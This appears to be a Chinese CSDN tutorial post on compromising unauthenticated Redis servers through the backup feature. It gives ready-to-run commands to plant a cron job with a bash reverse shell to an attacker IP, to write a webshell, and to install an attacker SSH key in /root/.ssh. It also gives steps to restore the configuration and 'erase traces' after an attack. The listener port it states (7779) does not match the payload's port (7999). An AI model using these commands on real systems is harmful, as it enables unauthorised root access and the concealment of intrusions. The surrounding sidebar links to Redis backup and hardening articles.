Redis安全攻防(二)Redis通过备份功能实现的三种攻击方法

最新推荐文章于 2023-03-07 15:20:34 发布
最新推荐文章于 2023-03-07 15:20:34 发布
阅读量446 收藏 3
点赞数
分类专栏: WEB安全 文章标签: 安全 redis 数据库 网络安全 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54430466/article/details/115297530
版权

文章目录

1.利用redis备份写定时任务反弹shell

原理:利用redis备份功能进行文件操作

开始前可以做个备份,实际攻击中最好先执行config get dir 记清楚原来备份路径,方便还原擦除痕迹
在这里插入图片描述
利用redis-cli -h 目标ip 连接redis服务器

执行以下命令:

set x "\n* * * * * bash -i >& /dev/tcp/192.168.199.187/7999 0>&1\n"     //设置变量x,引号里为变量内容,这也备份的时候可以把内容写入备份目录

config set dir /var/spool/cron/  //修改备份目录到定时任务目录

config set dbfilename root //修改备份文件名为自己喜欢的名字

save //保存设置

测试如下:
在这里插入图片描述
自己复现可以利用crontab -e查看定时任务是否成功写入
在这里插入图片描述
攻击机监听设置的定时任务指定反弹shell的端口 7779,一会儿攻击机就成功接收目标机反弹的shell
在这里插入图片描述

2.利用备份写入webshell

原理步骤和上面差不多。前提是知道网站绝对路径,这种方法适用于服务器权限不够,但是redis对web有写入权限。

参考链接:https://www.leavesongs.com/PENETRATION/write-webshell-via-redis-server.html

3.利用备份上传公钥,实现服务器免密登录

ssh-keygen -t rsa 一路回车生成密钥
在这里插入图片描述
将目录下密钥保存为1.txt (可以自定义),执行

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

在这里插入图片描述
将密钥设置为crack变量内容, 上传目标机
在这里插入图片描述
同样利用redis-cli -h 目标ip 连接目标redis服务器,修改备份路径和备份文件名。
修改备份文件路径为/root/.ssh(目标机密钥存放的路径,不同机器情况可能不一致)
在这里插入图片描述
修改备份文件名,保存退出。

在这里插入图片描述
尝试免密连接服务器,漏洞利用成功。
在这里插入图片描述

4.清理痕迹,还原设置环境

del payload  //删除

config set dir /root   //修改路径为攻击前路径(环境路径根据实际情况而定)

config set dbfilename dump.rdb //修改备份文件名为默认文件名

测试如下:
在这里插入图片描述

5.系列文章地址

Redis安全攻防(一)未授权访问复现
Redis安全攻防(二)Redis通过备份功能实现的三种攻击方法
Redis安全攻防(三)设置密码认证

网络安全练习生
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis一键备份与恢复脚本+持久化操作记录
作者的博客园已搬家到CSDN,访问博客园主页将默认跳转至CSDN
04-13 238
使用自动恢复脚本,快速准确的一键恢复到指定时间的数据,保证业务的快速恢复。业务场景中,数据的恢复场景要求稳准快;制作测试数据,便于以下的案例测试。制作测试数据,便于以下的案例测试。数据,并在业务中一键快速恢复。备份间隔:建议在每隔2个小。保留时长:保留7天即可。数据,提高工作效率!
MySQL和Redis实现级缓存的方法详解
12-15
redis简介 Redis 是完全开源免费的,遵守BSD协议,是一个高... Redis支持数据的备份,即master-slave模式的数据备份 优势 性能极高 – Redis能读的速度是110000次/s,写的速度是81000次/s 丰富的数据类型 – Redis
记录Redis和MySQL被扫描注入攻击
qq_44610529的博客
08-05 1257
no 弱密码
Redis攻击方法总结
Docker的专栏
08-11 1211
Redis是什么?Redis数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可...
redis的.aof文件定时备份shell脚本
weixin_47036600的博客
03-07 322
linux定时备份redis文件到另一台服务器
redis漏洞防攻击
花非花雾非雾物语人生
06-14 1914
预防措施:1. 禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ,去掉前面的"#"即可(Redis本来就是作为内存数据库,只要监听在本机即可);2. 设置密码访问认证,可通过修改redis.conf配置文件中的"requirepass" 设置复杂密码 (需要重启Redis服务才能生效);3. 对访问源IP进行访问控制,可在防火墙限定指定源...
thinkPHP框架通过Redis实现增删改查操作的方法详解
01-02
本文实例讲述了thinkPHP框架通过Redis实现增删改查操作的方法。分享给大家供大家参考,具体如下: 一、概述 Redis是一个NoSQL数据库,由于其数据类型的差异,所以要在MVC框架中实现CURD操作,比较繁锁。事实上在...
redis实现加锁的几种方法示例详解
12-16
本文主要给大家介绍了关于redis实现加锁的几种方法,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 1. redis加锁分类 redis能用的的加锁命令分表是INCR、SETNX、SET 2. 第一种锁命令INCR 这种...
基于redis实现的点赞功能设计思路详解
12-16
数据库直接落地存储, 另外一种就是利用点赞的业务特征来扔到redis(或memcache)中, 然后离线刷回mysql等。 直接写入Mysql 直接写入Mysql是最简单的做法。 做两个表即可, 1、post_like 记录文章被赞的次数,已有...
redis持久化aof混备+备份脚本 linux 持续更新
weixin_45717886的博客
05-06 539
redis aof 与 rdb 介绍 相关链接1 相关连接2 相关连接3 开启appendonly 当前生效 127.0.0.1:6379> config get appendonly 1) "appendonly" 2) "no" 127.0.0.1:6379> config set appendonly yes #开启aof持久化 127.0.0.1:6379> config set save "" #关闭rdb持久化 127.0.0.1:6379> config ge
常见Web漏洞危害及整改建议
开心星人的博客
08-23 2514
提交漏洞成功的时候,经常需要填漏洞危害和整改意见。这篇文章没啥技术含量,就是把这些知识粘在一起,内容均来自互联网。还在补充中这篇文章挺全的。
Redis 数据备份与恢复
DTCloud
05-24 234
Redis SAVE 命令用于创建当前数据库备份。 语法 redis Save 命令基本语法如下: redis 127.0.0.1:6379> SAVE 实例 redis 127.0.0.1:6379> SAVE OK 该命令将在 redis 安装目录中创建dump.rdb文件。 恢复数据 如果需要恢复数据,只需将备份文件 (dump.rdb) 移动到 redis 安装目录并启动服务即可。获取 redis 目录可以使用 CONFIG 命令,如下所示: redis 127.0.0.1:6
数据库攻防Redis
m0_71745754的博客
01-17 1043
Redis(Remote Dictionary Server)是一个由 Salvatore Sanfillppo 写的 key-value存储系统。是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的API。通常被称为数据结构服务器,因为值(value)可以是字符串(string)、哈希(hash)、列表(list)、集合(sets)和有序集合(sortedsets)等类型。
redis远程备份脚本_分布式实战:Redis企业级灾备方案
weixin_29482557的博客
01-31 292
本文首发于Ressmix个人站点:https://www.tpvlog.com上一章,我讲解了Redis的两种持久化方式的基本配置,那么在生产环境中,Redis的持久化到底该如何运用呢?企业级的数据备份和各种灾难下的数据恢复,又是怎么做的呢?本章,我就通过实战演练,讲一讲企业级Redis灾备方案。一、持久化配置策略Redis的持久化配置,就两种——RDB和AOF,在生产环境配置下,主要就...
记录一次redis漏洞攻击
陈浩然MC的博客
09-11 3170
服务器挖矿病毒的排查过程 事情起因:朋友的一台阿里云主机,登录特别卡,找我看看 这一看就感觉出问题了,机器特别卡,top看了一眼,cpu几乎是100%运行 但是奇怪的是用top命令完全看不出来哪个进程占用资源,当时的截图找不到了,这是第一次遇到这种情况,没有显示今晨占用资源,偏偏资源被跑满 排查 刚接手问题的时候我也是一脸闷逼,很奇怪,明明是没有进程占用的,为什么还会这样? ...
记录Redis的一次攻击事件
孤城长烟
03-12 2501
买了阿里云的一台服务器自己玩的,今天发现Redis攻击了,执行crontab的时候,发现莫名其妙的任务。一开始也搞不懂哪里被攻击了,上午查了一下,刚好看到一篇关于redis攻击的文章。结合自己的情况,发现果然是这样的。
昨天下午redis的key全部变成backup,value也变了,今天早上所有数据都没了的原因
weixin_43809055的博客
05-12 6502
昨天下午redis的key全部变成backup,value也变了,今天早上所有数据都没了,我丢,当时给我搞到一脸蒙,代码没问题,redis也没有重启之类的,想不到到底什么原因,百度的也都对不上原因,无奈之下去悬赏提问,大佬说可能被攻击了,我突然想到,mmp没有设密码,果然,去查询日志时发现: 这里可以看到,半夜是有人请求的,这里因为请求失败而导致数据清空了,总而言之就是没有设置密码而将redis暴露到公网的原因,大家下一次就不要忘记设置密码了 docker命令: 查看日志: docker logs -f r
Redis的数据变成backup
MoooJL
06-09 1928
redis的数据变成backup
能够使用两种方法实现redis的持久化
最新发布
05-23
Redis有两种持久化方式,分别是RDB和AOF。 1. RDB持久化方式: RDB持久化方式是将Redis在内存中的数据定期写入磁盘中的RDB文件,以便于数据的恢复。RDB文件是一个经过压缩的进制文件,它存储了Redis在某个时间点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值